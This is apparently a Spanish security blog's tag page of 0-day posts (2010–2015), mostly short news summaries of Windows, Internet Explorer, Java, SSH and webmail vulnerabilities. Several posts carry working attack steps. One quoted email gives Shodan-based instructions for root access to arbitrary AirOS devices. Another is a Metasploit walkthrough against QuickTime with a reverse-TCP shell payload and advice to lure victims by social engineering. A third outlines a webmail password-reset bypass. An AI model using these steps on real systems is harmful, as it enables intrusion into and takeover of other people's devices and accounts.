Mostrando entradas con la etiqueta 0-day. Mostrar todas las entradas
Mostrando entradas con la etiqueta 0-day. Mostrar todas las entradas

13 may. 2015

Escalar Privilegios en Windows 7 [Exploit Compilado] (CVE-2015-1701)


Recientemente se a publicado un Exploit que permite escalar privilegios en sistemas operativos Windows 7. El exploit fue descubierto por un investigador ruso (hfiref0x) quien publicó en GitHub el código fuente y el exploit compilado listo para ser ejecutado.

15 feb. 2014

0-Day en Internet Explorer 10 Remote Code Execution (CVE-2014-0322) [Exploit]


Los investigadores de seguridad de FireEye han descubierto un nuevo exploit IE 10 0-Day (CVE-2014-0322), que está siendo utilizado en un ataque de Watering Hole Attack y siendo servida desde el sitio web de U.S. Veterans of Foreign Wars (vfw[.]org), agregando un iFrame.

1 oct. 2013

Exploit en todas las versiones de Internet Explorer (CVE-2013-3893) [Explotación con MSF]


Recientemente se ha hecho publico un Exploit que inicialmente fue descubierto en acción en Japón, pero el estudio de éste lo propagó rápidamente a otras partes (CVE-2013-3893), hasta el momento no ha salido un parche oficial por parte de Microsoft y afecta a Internet Explorer desde la versión 6 a la 11 lo que lo transforma en altamente riesgoso para la integridad de nuestros sistemas.

Se trata de una vulnerabilidad Use-after-free en el SetMouseCapture implementado en mshtml.dll, atacantes remotos pueden ejecutar código arbitrario mediante strings en JavaScrip.

26 feb. 2013

Otro 0day en Java permite Ejecución de Código Remoto (Video MSF)

Hace más de un mes que se publicó un Grave 0day en Java que permitía la Ejecución de Código Remoto. Lo cual fue noticia mundial ya que grandes empresas como Apple recomendaron dejar de usar Java, e incluso el gobierno de EEUU llamó a desinstalar por completo Java, ya que era una amenaza real y latente que se dilató en parchar.

Recientemente (18-01-2013) fue descubierta una nueva vulnerabilidad (CVE-2013-0431 Java Applet JMX Remote Code Execution) que es muy parecida a la anterior (incluso parece ser una secuela) que nuevamente afecta al SandBox.

3 dic. 2012

Exploit 0day Remoto para el Servidor SSH Tectia [Vídeo]

Hace unos días Kingcope liberó más de 10 0days y pruebas de concepto para vulnerabilidades que afectan a productos como MySQL, IBM System Director, FreeSSHD y FreeFTPD. 

Yo les quería escribir sobre la vulnerabilidad que afecta a los servidores SSH Tectia, específicamente las versiones:

  • SSH-2.0-6.1.9.95 SSH Tectia Server (Última versión de www.tectia.com)
  • SSH-2.0-6.0.11.5 SSH Tectia Server

Lo que hace jugoso a este exploit es que la instalación por defecto en Linux (versión 6.1.9.95 de Tectia) es vulnerable al ataque, lo que lo transforma en altamente peligroso y provechoso para el potencial atacante.

20 sept. 2012

Grave 0-Day en Internet Explorer (Vídeo MSF)

Hace ya un par de días que se hizo pública una grave vulnerabilidad 0-Day que afecta Internet Explorer que puede ser explotada por atacantes cuando se hace uso del objeto CMshtmlEd.

Para infectar a un sistema simplemente basta con que el usuario use Internet Explorer y visite una web infectada con el código malicioso. Afecta a las versiones 7, 8 y 9 de Internet Explorer y no se conoce restricción de Sistema Operativo (ha sido probado con éxito en Windows XP, Vista, 7 e inclusive  Windows 8)

Ya está disponible el módulo de Metasploit que se aprovecha de esta vulnerabilidad, por lo cual se debe simplemente actualizar Metasploit para gozar de él.

Vídeo explotación con MSF:

28 abr. 2012

Grave 0-Day en Hotmail, AOL y Yahoo permite cambio de contraseñas

Ayer se reportó una grave vulnerabilidad 0-day en Hotmail, que permitía a usuarios no legítimos cambiar la contraseña de cualquier correo sin necesidad de logeo, contraseña o responder preguntas secretas, sólo se necesitaba el famoso add-on Tamper Data  y cambiar parámetros en las solicitudes HTTP en tiempo real. Esto permitió que muchos "hackers" (usuarios no legítimos) resetearan las contraseñas de muchas cuentas de usuarios legítimos. Una vez la contraseña estaba "restablecida", se podía acceder a la cuenta simplemente con la nueva contraseña y dejar sin acceso al real usuario de la cuenta.

 Como si no fuera suficiente, hoy otro hacker desconocido informó de otras vulnerabilidades similares en Hotmail, Yahoo y AOL. Que también hacían uso de Tamper Data para cambiar parámetros en las solicitudes HTTP y resetear la contraseña con éxito.

21 mar. 2012

El Bug de Chrome lo quieren vender en Millones

Hace unas dos semanas, nos sorprendimos cuando se anunció que Chrome había sido hackeado, en el marco de la conferencia Pwn2Own. El grupo que había logrado la hazaña era Vupen, una compañía francesa que se dedica a vender exploits a gobiernos y agencias de inteligencia alrededor del mundo por abultadas sumas de dinero.

Pese a lo que parecía en un principio, Vupen nunca tuvo ninguna intención de entregarle a Google la información que habían descubierto sobre el navegador - exploits de día cero que permitían tomar control de un PC sin que el usuario se enterara siquiera.

26 dic. 2011

0day en AirOS (Acceso como Root)

Bueno, me ha llegado un mail bastante interesante sobre un 0day en Arios, y no sé de que tanto tiempo estemos hablando, pero revisando un poco me he dado cuenta que sigue muy vigente...

Y esto decia el mail:

AirOS remote root 0day

since some genius decided to write worm for this, here is early santa for you, kids:

1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?

IRCNet opers: expect some decent KNB bot mayhem for a while :)

25 nov. 2010

Nuevo 0-day UAC bypass (Escala de Privilegios en Windows)

Si el pasado 20 de noviembre se hizo público en Exploit Database una vulnerabilidad utilizada por Stuxnet para elevar privilegios mediante un fallo en el programador de tareas de Windows, ahora acaba de salir a la luz un nuevo 0-day que elude el control de cuentas de usuario (UAC) para conseguir privilegios de 'system'.

4 sept. 2010

Explotando con Metasploit el 0-day en QuickTime

Bueno... Este es un texto bastante interesante realizada por SeguridadApple donde nos enseña a sacarle provecho al 0-day descubierto hace poco en QuickTime con Metasploit.


En la entrada de hoy, se va a presentar en modo prueba de concepto lo sencillo y eficaz que sería realizar un ataque aprovechándonos de dicha vulnerabilidad. Para realizar dicha función vamos a utilizar el framework metasploit en su versión 3.4.2, y la última versión de QuickTime a día de hoy (7.6.7).


Una vez iniciado metasploit pasaremos a ejecutar los siguientes comandos:
  •  use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que vamos a utilizar)
  • set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
  • set SRVPORT 80 (Puerto local del servicio) 
  •  set URIPATH juegos (Uri del servicio)
  • set payload windows/shell/reverse_tcp (Payload que vamos a utilizar) 
  •  set LHOST 192.168.0.162 (IP donde se conectará la víctima) 
  •  set LPORT 5050 (Puerto local de escucha) 
  •   exploit (Ejecutamos el exploit)
Acto seguido observaremos como metasploit nos monta el servicio en la uri y puerto indicado.


Con esto ya tendremos montando nuestro servicio que explota la vulnerabilidad de QuickTime, ahora sólo faltará, mediante ingeniería social, conseguir que alguien se conecte a nuestro servidor.


Una vez que esto ha sucedido metasploit nos informará de que se ha creado una nueva sesión con la nueva víctima, en este caso con IP y puerto: 192.168.0.143:1105.


Ahora únicamente bastará con pasarnos a la sesión indicada mediante el siguiente comando:

  •  sessions -i 2
De este modo se nos devolverá una shell reversa de la víctima, obteniendo control total de su máquina.


Hasta el momento no existe parche para esta vulnerabilidad, por lo que se recomienda tener cuidado con el uso de QuickTime en Internet.

Autor: SeguridadApple
Fuente: http://www.seguridadapple.com/